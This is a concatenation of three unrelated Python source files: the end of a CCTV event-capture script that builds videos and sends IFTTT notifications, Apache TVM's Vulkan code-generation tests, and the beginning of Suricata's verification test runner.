dt = msg["logtime"].split('T')
cctvlogger.info("DateTime: " + str(dt))
d = dt[0].split('-')
cctvlogger.info("Date split: " + str(d))
d.append(dt[1])
event_dir = EVENT_DIR + '/' + '/'.join(d)
os.makedirs(event_dir, exist_ok=True)
else:
now = datetime.datetime.now()
# Check to see whether we have another message during the event
if not in_q.empty():
# We are already handling an event so extend the event time
msg = in_q.get()
cctvlogger.debug("Frame Grabber, got Message: " + str(msg))
end_grab = now + datetime.timedelta(seconds=GRAB_FOR_SECS)
cctvlogger.info("End of event extended: " + str(end_grab))
# Should we grab the next frame?
if grabbing and now > next_grab:
# we need to get a frame
base_filename = event_dir + "/" + str(event_seq).zfill(4)
request.urlretrieve(IMAGE_URL, base_filename + ".jpg")
next_grab = next_grab + frame_interval
event_seq += 1
# Check to see whether we should end the event
if grabbing is True and now > end_grab:
cctvlogger.info("End of event capture...")
# Finished grabbing the event
# Signal to make video thread to do its stuff
out_q.put(event_dir)
# Reset
grabbing = False
event_seq = 0
event_dir = None
def make_video(in_q):
cctvlogger = logging.getLogger('cctv')
cctvlogger.info("Video processor started")
while True:
# Block waiting for an incoming message
msg = in_q.get()
cctvlogger.info("Got path: " + str(msg))
# Convert video
result = call(VIDEO_CONVERT, cwd=msg)
if result == 0:
# Conversion was successful so move the video and remove the jpgs
pp = str(msg).split('/')
newpath = '/'.join(pp[:-1])
vidfile = newpath + '/' + pp[-1].split('.')[0] + ".mp4"
vidurl = "https://geo-fun.org/events/" \
+ pp[-2] + "/" + pp[-1].split('.')[0] + ".mp4"
cctvlogger.info("Moving video event file to " + vidfile)
os.rename(msg + "/event.mp4", vidfile)
shutil.rmtree(msg, ignore_errors=True)
# Update symlinks
latest = EVENT_DIR + "/latest.mp4"
today = EVENT_DIR + "/today"
try:
os.remove(latest)
os.remove(today)
except OSError:
pass
# Symlinks need to be relative because of Docker
path_parts = vidfile.split("/")
os.symlink("/".join(path_parts[3:]), latest)
path_parts = newpath.split("/")
os.symlink("/".join(path_parts[3:]), today)
# Notify event to IFTTT Maker channel
if MAKER_URL is not None:
cctvlogger.debug("URL: " + vidurl)
json_event = urllib.parse.urlencode({"value1": vidurl})
cctvlogger.debug("Encoded json: " + json_event)
json_event = json_event.encode('ascii')
with urllib.request.urlopen(MAKER_URL, json_event) as f:
cctvlogger.debug(f.read().decode('utf-8'))
if __name__ == "__main__":
setup_logging()
q1 = Queue()
q2 = Queue()
t1 = Thread(target=frame_grabber, args=(q1, q2, IMAGE_URL,))
t2 = Thread(target=mqtt_listner, args=(q1,))
t3 = Thread(target=make_video, args=(q2,))
t1.start()
t2.start()
t3.start()
|
test_target_codegen_vulkan.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import re
import numpy as np
import tvm
import tvm.testing
from tvm import relay, te
from tvm.topi.math import cast
def check_mod(mod, x_np, res_np):
target = "vulkan"
dev = tvm.device(target, 0)
ex = relay.create_executor("vm", mod=mod, device=dev, target=target)
res = ex.evaluate()(x_np).asnumpy()
tvm.testing.assert_allclose(res, res_np, atol=1e-5)
@tvm.testing.requires_vulkan
def test_vector_comparison():
target = "vulkan"
def check_correct_assembly(dtype):
n = (1024,)
A = te.placeholder(n, dtype=dtype, name="A")
B = te.compute(
A.shape,
lambda i: tvm.tir.Select(
A[i] >= 0, A[i] + tvm.tir.const(1, dtype), tvm.tir.const(0, dtype)
),
name="B",
)
s = te.create_schedule(B.op)
(bx, tx) = s[B].split(s[B].op.axis[0], factor=128)
(tx, vx) = s[B].split(tx, factor=4)
s[B].bind(bx, te.thread_axis("blockIdx.x"))
s[B].bind(tx, te.thread_axis("threadIdx.x"))
s[B].vectorize(vx)
f = tvm.build(s, [A, B], target)
# Verify we generate the boolx4 type declaration and the OpSelect
# v4{float,half,int} instruction
assembly = f.imported_modules[0].get_source()
matches = re.findall("%v4bool = OpTypeVector %bool 4", assembly)
assert len(matches) == 1
matches = re.findall("OpSelect %v4.*", assembly)
assert len(matches) == 1
check_correct_assembly("float32")
check_correct_assembly("int32")
check_correct_assembly("float16")
tx = te.thread_axis("threadIdx.x")
bx = te.thread_axis("blockIdx.x")
@tvm.testing.requires_vulkan
def test_vulkan_copy():
def check_vulkan(dtype, n):
A = te.placeholder((n,), name="A", dtype=dtype)
dev = tvm.vulkan(0)
a_np = np.random.uniform(size=(n,)).astype(A.dtype)
a = tvm.nd.empty((n,), A.dtype, dev).copyfrom(a_np)
b_np = a.asnumpy()
tvm.testing.assert_allclose(a_np, b_np)
tvm.testing.assert_allclose(a_np, a.asnumpy())
for _ in range(100):
dtype = np.random.choice(["float32", "float16", "int8", "int32"])
logN = np.random.randint(1, 15)
peturb = np.random.uniform(low=0.5, high=1.5)
check_vulkan(dtype, int(peturb * (2 ** logN)))
@tvm.testing.requires_vulkan
def test_vulkan_vectorize_add():
num_thread = 8
def check_vulkan(dtype, n, lanes):
A = te.placeholder((n,), name="A", dtype="%sx%d" % (dtype, lanes))
B = te.compute((n,), lambda i: A[i] + tvm.tir.const(1, A.dtype), name="B")
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=num_thread)
s[B].bind(xo, bx)
s[B].bind(xi, tx)
fun = tvm.build(s, [A, B], "vulkan")
dev = tvm.vulkan(0)
a = tvm.nd.empty((n,), A.dtype, dev).copyfrom(np.random.uniform(size=(n, lanes)))
c = tvm.nd.empty((n,), B.dtype, dev)
fun(a, c)
tvm.testing.assert_allclose(c.asnumpy(), a.asnumpy() + 1)
check_vulkan("float32", 64, 2)
check_vulkan("float16", 64, 2)
@tvm.testing.requires_vulkan
def test_vulkan_stress():
"""
Launch a randomized test with multiple kernels per stream, multiple uses of
kernels per stream, over multiple threads.
"""
import random
import threading
n = 1024
num_thread = 64
def run_stress():
def worker():
A = te.placeholder((n,), name="A", dtype="float32")
B = te.placeholder((n,), name="B", dtype="float32")
functions = [
(
lambda: te.compute((n,), lambda i: 2 * A[i] + 3 * B[i]),
lambda a, b: 2 * a + 3 * b,
),
(lambda: te.compute((n,), lambda i: A[i] + B[i]), lambda a, b: a + b),
(lambda: te.compute((n,), lambda i: A[i] + 2 * B[i]), lambda a, b: a + 2 * b),
]
def build_f(f_ref):
(C_f, ref) = f_ref
C = C_f()
s = te.create_schedule(C.op)
xo, xi = s[C].split(C.op.axis[0], factor=num_thread)
s[C].bind(xo, bx)
s[C].bind(xi, tx)
fun = tvm.build(s, [A, B, C], "vulkan")
return (fun, ref)
fs = [
build_f(random.choice(functions)) for _ in range(np.random.randint(low=1, high=10))
]
dev = tvm.vulkan(0)
a = tvm.nd.empty((n,), A.dtype, dev).copyfrom(np.random.uniform(size=(n,)))
b = tvm.nd.empty((n,), B.dtype, dev).copyfrom(np.random.uniform(size=(n,)))
cs = [tvm.nd.empty((n,), A.dtype, dev) for _ in fs]
for ((f, _), c) in zip(fs, cs):
f(a, b, c)
for ((_, ref), c) in zip(fs, cs):
tvm.testing.assert_allclose(c.asnumpy(), ref(a.asnumpy(), b.asnumpy()))
ts = [threading.Thread(target=worker) for _ in range(np.random.randint(1, 10))]
for t in ts:
t.start()
for t in ts:
t.join()
run_stress()
@tvm.testing.requires_vulkan
def test_vulkan_bool_load():
def do_copy(A, B, n):
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(A)
B = ib.buffer_ptr(B)
tx = te.thread_axis("threadIdx.x")
bx = te.thread_axis("blockIdx.x")
max_threads = 32
ib.scope_attr(bx, "thread_extent", tvm.tir.indexdiv(n + max_threads - 1, max_threads))
ib.scope_attr(tx, "thread_extent", max_threads)
tid = bx * max_threads + tx
with ib.if_scope(tid < n):
B[tid] = cast(A[tid], "int32")
return ib.get()
n = 1024
A = te.placeholder((n,), name="A", dtype="bool")
B = te.placeholder((n,), name="B", dtype="int32")
target = "vulkan"
B = te.extern(
A.shape,
[A],
lambda ins, outs: do_copy(ins[0], outs[0], n),
name="bool_copy_ir",
dtype="int32",
)
s = te.create_schedule(B.op)
with tvm.transform.PassContext(opt_level=3):
func = tvm.build(s, [A, B], target)
dev = tvm.device(target, 0)
a_np = np.random.uniform(size=n) > 0.5
b_np = np.zeros((n,), dtype="int32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
func(a, b)
ref = a_np.astype(np.int32)
tvm.testing.assert_allclose(b.asnumpy(), ref)
@tvm.testing.requires_vulkan
def test_vulkan_pushconstants():
# Three 32 bit pushconstants: any_dim, stride, stride
dtype = "float32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x], relay.sqrt(x))
x_np = np.random.uniform(size=(10,)).astype(dtype)
res_np = np.sqrt(x_np)
check_mod(mod, x_np, res_np)
# One 64 bit and one 32 bit constants
dtype = "int32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x], relay.argsort(x))
x_np = np.random.randint(0, high=10, size=(10,)).astype(dtype)
res_np = np.argsort(x_np)
check_mod(mod, x_np, res_np)
# One 64 bit and one 32 bit constants
dtype = "int32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x], relay.cumsum(x))
x_np = np.random.randint(0, high=10, size=(10,)).astype(dtype)
res_np = np.cumsum(x_np)
check_mod(mod, x_np, res_np)
@tvm.testing.requires_vulkan
def test_vulkan_unique():
dtype = "int32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
[unique, _, num_unique] = relay.unique(x, is_sorted=True)
mod["main"] = relay.Function([x], relay.op.strided_slice(unique, begin=[0], end=num_unique))
x_np = np.random.randint(0, high=10, size=(10,)).astype(dtype)
res_np = np.unique(x_np)
check_mod(mod, x_np, res_np)
@tvm.testing.requires_vulkan
def test_vulkan_constant_passing():
target = "vulkan"
def test_scalar_params(num_int_params):
n = te.var("n")
scalars = [te.var("scale{}".format(i)) for i in range(num_int_params)]
scalar_sum = scalars[0]
for s in scalars[1:]:
scalar_sum += s
A = te.placeholder((n,), name="A")
B = te.compute(A.shape, lambda i: scalar_sum + A[i], name="B")
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=64)
s[B].bind(xo, bx)
s[B].bind(xi, tx)
f_add = tvm.build(s, scalars + [A, B], target)
n = 1024
scalars = [1 for _ in scalars]
dev = tvm.vulkan(0)
a = tvm.nd.array(np.random.uniform(size=n).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(n, dtype=B.dtype), dev)
f_add(*scalars, a, b)
tvm.testing.assert_allclose(a.asnumpy() + sum(scalars), b.asnumpy())
# f_add has 3+num_int_params scalar parameters. The other three
# are length_n, stride1, and stride2.
# 4 params, 32 bytes. Within 128-byte spec-guaranteed size of
# push constants. Uses push constants.
test_scalar_params(1)
# 24 params, 192 bytes. Too big for push constants, uses uniform
# buffer.
test_scalar_params(20)
# 2047 params, 16376 bytes, just below 16kB of uniform buffer
# space guaranteed by the vulkan spec.
test_scalar_params(2044)
@tvm.testing.parametrize_targets("vulkan")
def test_vulkan_while_if(target, dev):
def do_compute(A, B, n):
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(A)
B = ib.buffer_ptr(B)
ib.scope_attr(te.thread_axis("blockIdx.x"), "thread_extent", 0)
iterations = ib.allocate("int32", (1,), name="iterations", scope="local")
iterations[0] = 0
B[0] = 0
# WhileNode's condition is re-evaluated every loop. The
# if_then_else block introduces additional labels/blocks that
# must be kept separate from the WhileNode's block.
loop_condition = iterations[0] < tvm.tir.if_then_else(A[0] > 0, 10, 20)
with ib.while_loop(loop_condition):
iterations[0] += 1
B[0] += iterations[0]
return ib.get()
n = 1
dtype = "int32"
A = te.placeholder((n,), name="A", dtype=dtype)
B = te.extern(
A.shape,
[A],
lambda ins, outs: do_compute(ins[0], outs[0], n),
dtype=dtype,
)
s = te.create_schedule(B.op)
# Point of failure would be here, at tvm.build.
with tvm.transform.PassContext(opt_level=3):
func = tvm.build(s, [A, B], target)
a = tvm.nd.array(np.array([5], dtype=A.dtype), dev)
b = tvm.nd.array(np.zeros(n, dtype=A.dtype), dev)
func(a, b)
tvm.testing.assert_allclose(b.asnumpy(), [55])
a = tvm.nd.array(np.array([-5], dtype=A.dtype), dev)
b = tvm.nd.array(np.zeros(n, dtype=A.dtype), dev)
func(a, b)
tvm.testing.assert_allclose(b.asnumpy(), [210])
if __name__ == "__main__":
test_vector_comparison()
test_vulkan_copy()
test_vulkan_vectorize_add()
test_vulkan_stress()
test_vulkan_constant_passing()
test_vulkan_bool_load()
test_vulkan_pushconstants()
test_vulkan_unique()
|
run.py
|
#! /usr/bin/env python3
#
# Copyright (C) 2017-2021 Open Information Security Foundation
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import print_function
import sys
import os
import os.path
import subprocess
import threading
import shutil
import string
import argparse
import yaml
import glob
import re
import json
import unittest
import multiprocessing as mp
from collections import namedtuple
import threading
import filecmp
import subprocess
import yaml
# Check if we can validate EVE files against the schema.
try:
import jsonschema
VALIDATE_EVE = True
except:
VALIDATE_EVE = False
WIN32 = sys.platform == "win32"
LINUX = sys.platform.startswith("linux")
suricata_bin = "src\suricata.exe" if WIN32 else "./src/suricata"
suricata_yaml = "suricata.yaml" if WIN32 else "./suricata.yaml"
if LINUX:
manager = mp.Manager()
lock = mp.Lock()
failedLogs = manager.list()
count_dict = manager.dict()
check_args = manager.dict()
else:
failedLogs = []
count_dict = {}
check_args = {}
# Bring in a lock from threading to satisfy the MP semantics when
# not using MP.
lock = threading.Lock()
count_dict['passed'] = 0
count_dict['failed'] = 0
count_dict['skipped'] = 0
check_args['fail'] = 0
class SelfTest(unittest.TestCase):
def test_parse_suricata_version(self):
version = parse_suricata_version("4.0.0")
self.assertEqual(
(4, 0, 0), (version.major, version.minor, version.patch))
version = parse_suricata_version("444.444.444")
self.assertEqual(
(444, 444, 444), (version.major, version.minor, version.patch))
version = parse_suricata_version("4.1.0-dev")
self.assertEqual(
(4, 1, 0), (version.major, version.minor, version.patch))
version = parse_suricata_version("4")
self.assertEqual(
(4, 0, 0), (version.major, version.minor, version.patch))
version = parse_suricata_version("4.0.3")
self.assertEqual(
(4, 0, 3), (version.major, version.minor, version.patch))
def test_version_equal(self):
self.assertTrue(Version().is_equal(SuricataVersion(5, 0, 0), SuricataVersion(5, 0, 0)))
self.assertTrue(Version().is_equal(SuricataVersion(5, 1, 0), SuricataVersion(5, None, None)))
self.assertFalse(Version().is_equal(SuricataVersion(4, 1, 0), SuricataVersion(5, None, None)))
def test_version_lt(self):
comp = Version()
self.assertTrue(comp.is_lt(SuricataVersion(5, 0, 3), SuricataVersion(6, None, None)))
self.assertTrue(comp.is_lt(SuricataVersion(6, 0, 0), SuricataVersion(6, 0, 1)))
self.assertTrue(comp.is_lt(SuricataVersion(6, 0, 0), SuricataVersion(6, 1, 1)))
self.assertFalse(comp.is_lt(SuricataVersion(6, 1, 2), SuricataVersion(6, 1, 1)))
self.assertTrue(comp.is_lt(SuricataVersion(6, 0, 0), SuricataVersion(7, 0, 0)))
class TestError(Exception):
pass
class UnsatisfiedRequirementError(Exception):
pass
class TerminatePoolError(Exception):
pass
SuricataVersion = namedtuple(
"SuricataVersion", ["major", "minor", "patch"])
def parse_suricata_version(buf):
m = re.search("(?:Suricata version |^)(\d+)\.?(\d+)?\.?(\d+)?.*", str(buf).strip())
if m:
major = int(m.group(1)) if m.group(1) else 0
minor = int(m.group(2)) if m.group(2) else 0
patch = int(m.group(3)) if m.group(3) else 0
return SuricataVersion(
major=major, minor=minor, patch=patch)
return None
def get_suricata_version():
output = subprocess.check_output([suricata_bin, "-V"])
return parse_suricata_version(output)
def pipe_reader(fileobj, output=None, verbose=False):
for line in fileobj:
line = line.decode()
if output:
output.write(line)
output.flush()
if verbose:
print(line.strip())
def handle_exceptions(func):
def applicator(*args, **kwargs):
result = False
try:
result = func(*args,**kwargs)
except TestError as te:
print("===> {}: Sub test #{}: FAIL : {}".format(kwargs["test_name"], kwargs["test_num"], te))
check_args_fail()
kwargs["count"]["failure"] += 1
except UnsatisfiedRequirementError as ue:
if args and not args[0].quiet:
print("===> {}: Sub test #{}: SKIPPED : {}".format(kwargs["test_name"], kwargs["test_num"], ue))
kwargs["count"]["skipped"] += 1
else:
if result:
kwargs["count"]["success"] += 1
else:
print("\n===> {}: Sub test #{}: FAIL : {}".format(kwargs["test_name"], kwargs["test_num"], kwargs["check"]["args"]))
kwargs["count"]["failure"] += 1
return kwargs["count"]
return applicator
class Version:
"""
Class to compare Suricata versions.
"""
def is_equal(self, a, b):
"""Check if version a and version b are equal in a semantic way.
For example:
- 4 would match 4, 4.x and 4.x.y.
- 4.0 would match 4.0.x.
- 4.0.3 would match only 4.0.3.
"""
if not a.major == b.major:
return False
if a.minor is not None and b.minor is not None:
if a.minor != b.minor:
return False
if a.patch is not None and b.patch is not None:
if a.patch != b.patch:
return False
return True
def is_gte(self, v1, v2):
"""Return True if v1 is great than or equal to v2."""
if v1.major < v2.major:
return False
elif v1.major > v2.major:
return True
if v1.minor < v2.minor:
return False
elif v1.minor > v2.minor:
return True
if v1.patch < v2.patch:
return False
return True
def is_lt(self, v1, v2):
"""Return True if v1 is less than v2."""
if v1.major < v2.major:
return True
elif v1.minor < v2.minor:
return True
elif v1.patch < v2.patch:
return True
return False
class SuricataConfig:
def __init__(self, version):
self.version = version
self.features = set()
self.config = {}
self.load_build_info()
def load_build_info(self):
output = subprocess.check_output([suricata_bin, "--build-info"])
start_support = False
for line in output.splitlines():
if line.decode().startswith("Features:"):
self.features = set(line.decode().split()[1:])
if "Suricata Configuration" in line.decode():
start_support = True
if start_support and "support:" in line.decode():
(fkey, val) = line.decode().split(" support:")
fkey = fkey.strip()
val = val.strip()
if val.startswith("yes"):
self.features.add(fkey)
def load_config(self, config_filename):
output = subprocess.check_output([
suricata_bin,
"-c", config_filename,
"--dump-config"])
self.config = {}
for line in output.decode("utf-8").split("\n"):
parts = [p.strip() for p in line.split("=", 1)]
if parts and parts[0]:
if len(parts) > 1:
val = parts[1]
else:
val = ""
self.config[parts[0]] = val
def has_feature(self, feature):
return feature in self.features
def check_requires(requires, suricata_config: SuricataConfig):
suri_version = suricata_config.version
for key in requires:
if key == "min-version":
min_version = requires["min-version"]
if not is_version_compatible(version=min_version,
suri_version=suri_version, expr="gte"):
raise UnsatisfiedRequirementError(
"requires at least version {}".format(min_version))
elif key == "lt-version":
lt_version = requires["lt-version"]
if not is_version_compatible(version=lt_version,
suri_version=suri_version, expr="lt"):
raise UnsatisfiedRequirementError(
"for version less than {}".format(lt_version))
elif key == "version":
req_version = requires["version"]
if not is_version_compatible(version=req_version,
suri_version=suri_version, expr="equal"):
raise UnsatisfiedRequirementError(
"only for version {}".format(req_version))
elif key == "features":
for feature in requires["features"]:
if not suricata_config.has_feature(feature):
raise UnsatisfiedRequirementError(
"requires feature %s" % (feature))
elif key == "env":
for env in requires["env"]:
if not env in os.environ:
raise UnsatisfiedRequirementError(
"requires env var %s" % (env))
elif key == "files":
for filename in requires["files"]:
if not os.path.exists(filename):
raise UnsatisfiedRequirementError(
"requires file %s" % (filename))
elif key == "script":
for script in requires["script"]:
try:
subprocess.check_call("%s" % script, shell=True)
except:
raise UnsatisfiedRequirementError(
"requires script returned false")
elif key == "pcap":
# Handle below...
pass
else:
raise Exception("unknown requires types: %s" % (key))
def find_value(name, obj):
"""Find the value in an object for a field specified by name.
Example names:
event_type
alert.signature_id
smtp.rcpt_to[0]
"""
parts = name.split(".")
for part in parts:
if part == "__len":
# Get the length of the object. Return -1 if the object is
# not a type that has a length (numbers).
try:
return len(obj)
except:
return -1
name = None
index = None
m = re.match("^(.*)\[(\d+)\]$", part)
if m:
name = m.group(1)
index = m.group(2)
else:
name = part
if not name in obj:
return None
obj = obj[name]
if index is not None:
try:
obj = obj[int(index)]
except:
return None
return obj
def is_version_compatible(version, suri_version, expr):
config_version = parse_suricata_version(version)
version_obj = Version()
func = getattr(version_obj, "is_{}".format(expr))
if not func(suri_version, config_version):
return False
return True
class FileCompareCheck:
def __init__(self, config, directory):
self.config = config
self.directory = directory
def run(self):
if WIN32:
print("skipping shell check on windows")
return True;
expected = os.path.join(self.directory, self.config["expected"])
filename = self.config["filename"]
try:
if filecmp.cmp(expected, filename):
return True
else:
raise TestError("%s %s \nFAILED: verification failed" % (expected, filename))
except Exception as err:
raise TestError("file-compare check failed with exception: %s" % (err))
class ShellCheck:
def __init__(self, config, env):
self.config = config
self.env = env
def run(self):
if not self.config or "args" not in self.config:
raise TestError("shell check missing args")
try:
if WIN32:
print("skipping shell check on windows")
return True;
output = subprocess.check_output(self.config["args"], shell=True, env=self.env)
if "expect" in self.config:
return str(self.config["expect"]) == output.decode().strip()
return True
except subprocess.CalledProcessError as err:
raise TestError("Shell command failed: {} -> {}".format(
self.config, err.output))
class StatsCheck:
def __init__(self, config, outdir):
self.config = config
self.outdir = outdir
def run(self):
stats = None
with open("eve.json", "r") as fileobj:
for line in fileobj:
event = json.loads(line)
if event["event_type"] == "stats":
stats = event["stats"]
for key in self.config:
val = find_value(key, stats)
if val != self.config[key]:
raise TestError("stats.%s: expected %s; got %s" % (
key, str(self.config[key]), str(val)))
return True
class FilterCheck:
def __init__(self, config, outdir, suricata_config):
self.config = config
self.outdir = outdir
self.suricata_config = suricata_config
self.suri_version = suricata_config.version
def run(self):
requires = self.config.get("requires", {})
req_version = self.config.get("version")
min_version = self.config.get("min-version")
if req_version is not None:
requires["version"] = req_version
if min_version is not None:
requires["min-version"] = min_version
feature = self.config.get("feature")
if feature is not None:
requires["features"] = [feature]
check_requires(requires, self.suricata_config)
if "filename" in self.config:
json_filename = self.config["filename"]
else:
json_filename = "eve.json"
if not os.path.exists(json_filename):
raise TestError("%s does not exist" % (json_filename))
count = 0
with open(json_filename, "r") as fileobj:
for line in fileobj:
event = json.loads(line)
if self.match(event):
count += 1
if count == self.config["count"]:
return True
if "comment" in self.config:
raise TestError("%s: expected %d, got %d" % (
self.config["comment"], self.config["count"], count))
raise TestError("expected %d matches; got %d for filter %s" % (
self.config["count"], count, str(self.config)))
def match(self, event):
for key, expected in self.config["match"].items():
if key == "has-key":
val = find_value(expected, event)
if val is None:
return False
elif key == "not-has-key":
val = find_value(expected, event)
if val is not None:
return False
else:
val = find_value(key, event)
if val != expected:
if str(val) == str(expected):
print("Different types but same string", type(val), val, type(expected), expected)
return False
return False
return True
class TestRunner:
def __init__(self, cwd, directory, outdir, suricata_config, verbose=False,
force=False, quiet=False):
self.cwd = cwd
self.directory = directory
self.suricata_config = suricata_config
self.verbose = verbose
self.force = force
self.output = outdir
self.quiet = quiet
# The name is just the directory name.
self.name = os.path.basename(self.directory)
# List of thread readers.
self.readers = []
# Load the test configuration.
self.config = None
self.load_config()
self.suricata_config.load_config(self.get_suricata_yaml_path())
def load_config(self):
if os.path.exists(os.path.join(self.directory, "test.yaml")):
self.config = yaml.safe_load(
open(os.path.join(self.directory, "test.yaml"), "rb"))
if self.config is None:
self.config = {}
def setup(self):
if "setup" in self.config:
for setup in self.config["setup"]:
for command in setup:
if command == "script":
subprocess.check_call(
"%s" % setup[command],
shell=True,
cwd=self.output)
def check_skip(self):
if not "skip" in self.config:
return
if isinstance(self.config["skip"], bool):
if self.config["skip"]:
raise UnsatisfiedRequirementError("skipped by default")
return
for skip in self.config["skip"]:
if "uid" in skip:
if WIN32:
raise UnsatisfiedRequirementError("uid based skip not supported on Windows")
if os.getuid() == skip["uid"]:
if "msg" in skip:
msg = skip["msg"]
else:
msg = "not for uid %d" % (skip["uid"])
raise UnsatisfiedRequirementError(msg)
if "feature" in skip:
if self.suricata_config.has_feature(skip["feature"]):
if "msg" in skip:
msg = skip["msg"]
else:
msg = "not for feature %s" % (skip["feature"])
raise UnsatisfiedRequirementError(msg)
if "config" in skip:
for pattern, need_val in skip["config"].items():
for key, val in self.suricata_config.config.items():
if re.match(pattern, key):
if str(need_val) == str(val):
raise UnsatisfiedRequirementError(
"not for %s = %s" % (
key, need_val))
def check_requires(self):
requires = self.config.get("requires", {})
check_requires(requires, self.suricata_config)
# Check if a pcap is required or not. By default a pcap is
# required unless a "command" has been provided.
if not "command" in self.config:
if "pcap" in requires:
pcap_required = requires["pcap"]
else:
pcap_required = True
if pcap_required and not "pcap" in self.config:
if not glob.glob(os.path.join(self.directory, "*.pcap")) + \
glob.glob(os.path.join(self.directory, "*.pcapng")):
raise UnsatisfiedRequirementError("No pcap file found")
def build_env(self):
env = os.environ.copy()
env["SRCDIR"] = self.cwd
env["TZ"] = "UTC"
env["TEST_DIR"] = self.directory
env["OUTPUT_DIR"] = self.output
env["ASAN_OPTIONS"] = "detect_leaks=1"
return env
def run(self, outdir):
if not self.force:
self.check_requires()
self.check_skip()
if WIN32 and "setup" in self.config:
raise UnsatisfiedRequirementError("test \"setup\" not supported on Windows")
shell = False
if "command" in self.config:
# on Windows skip 'command' tests
if WIN32:
raise UnsatisfiedRequirementError("\"command\" tests are not supported on Windows")
args = self.config["command"]
shell = True
else:
args = self.default_args()
env = self.build_env()
safe_env = {}
for key in env:
safe_env[key] = str(env[key])
if "count" in self.config:
count = self.config["count"]
else:
count = 1
if "exit-code" in self.config:
expected_exit_code = self.config["exit-code"]
else:
expected_exit_code = 0
for _ in range(count):
# Cleanup the output directory.
if os.path.exists(self.output):
shutil.rmtree(self.output)
os.makedirs(self.output)
self.setup()
stdout = open(os.path.join(self.output, "stdout"), "w")
stderr = open(os.path.join(self.output, "stderr"), "w")
if shell:
template = string.Template(args)
cmdline = template.substitute(safe_env)
else:
for a in range(len(args)):
args[a] = string.Template(args[a]).substitute(safe_env)
cmdline = " ".join(args) + "\n"
open(os.path.join(self.output, "cmdline"), "w").write(cmdline)
p = subprocess.Popen(
args, shell=shell, cwd=self.directory, env=env,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.start_reader(p.stdout, stdout)
self.start_reader(p.stderr, stderr)
for r in self.readers:
r.join()
r = p.wait()
if r != expected_exit_code:
raise TestError("got exit code %d, expected %d" % (
r, expected_exit_code));
check_value = self.check()
if VALIDATE_EVE:
check_output = subprocess.call(["{}/check-eve.py".format(TOPDIR), outdir, "-q"])
if check_output != 0:
raise TestError("Invalid JSON schema")
if not check_value["failure"] and not check_value["skipped"]:
if not self.quiet:
print("===> %s: OK%s" % (os.path.basename(self.directory), " (%dx)" % count if count > 1 else ""))
elif not check_value["failure"]:
if not self.quiet:
print("===> {}: OK (checks: {}, skipped: {})".format(os.path.basename(self.directory), sum(check_value.values()), check_value["skipped"]))
return check_value
def pre_check(self):
if "pre-check" in self.config:
subprocess.call(self.config["pre-check"], shell=True)
@handle_exceptions
def perform_filter_checks(self, check, count, test_num, test_name):
count = FilterCheck(check, self.output,
self.suricata_config).run()
return count
@handle_exceptions
def perform_shell_checks(self, check, count, test_num, test_name):
count = ShellCheck(check, self.build_env()).run()
return count
@handle_exceptions
def perform_stats_checks(self, check, count, test_num, test_name):
count = StatsCheck(check, self.output).run()
return count
@handle_exceptions
def perform_file_compare_checks(self, check, count, test_num, test_name):
count = FileCompareCheck(check, self.directory).run()
return count
def reset_count(self, dictionary):
for k in dictionary.keys():
dictionary[k] = 0
def check(self):
pdir = os.getcwd()
os.chdir(self.output)
count = {
"success": 0,
"failure": 0,
"skipped": 0,
}
try:
self.pre_check()
if "checks" in self.config:
self.reset_count(count)
for check_count, check in enumerate(self.config["checks"]):
for key in check:
if key in ["filter", "shell", "stats", "file-compare"]:
func = getattr(self, "perform_{}_checks".format(key.replace("-","_")))
count = func(check=check[key], count=count,
test_num=check_count + 1, test_name=os.path.basename(self.directory))
else:
print("FAIL: Unknown check type: {}".format(key))
finally:
os.chdir(pdir)
if count["failure"] or count["skipped"]:
return count
success_c = count["success"]
count["success"] = 1 if not success_c else success_c
return count
def default_args(self):
args = []
if self.suricata_config.valgrind:
suppression_opt = "--suppressions=%s" % os.path.join(self.cwd, "qa/valgrind.suppress")
args += [ "valgrind", "-v", "--error-exitcode=255", suppression_opt ]
args += [
os.path.join(self.cwd, "src/suricata"),
]
# Load args from config file.
if "args" in self.config:
assert(type(self.config["args"]) == type([]))
for arg in self.config["args"]:
args += re.split("\s", arg)
# In Suricata 5.0 the classification.config and
# reference.config were moved into the etc/ directory. For now
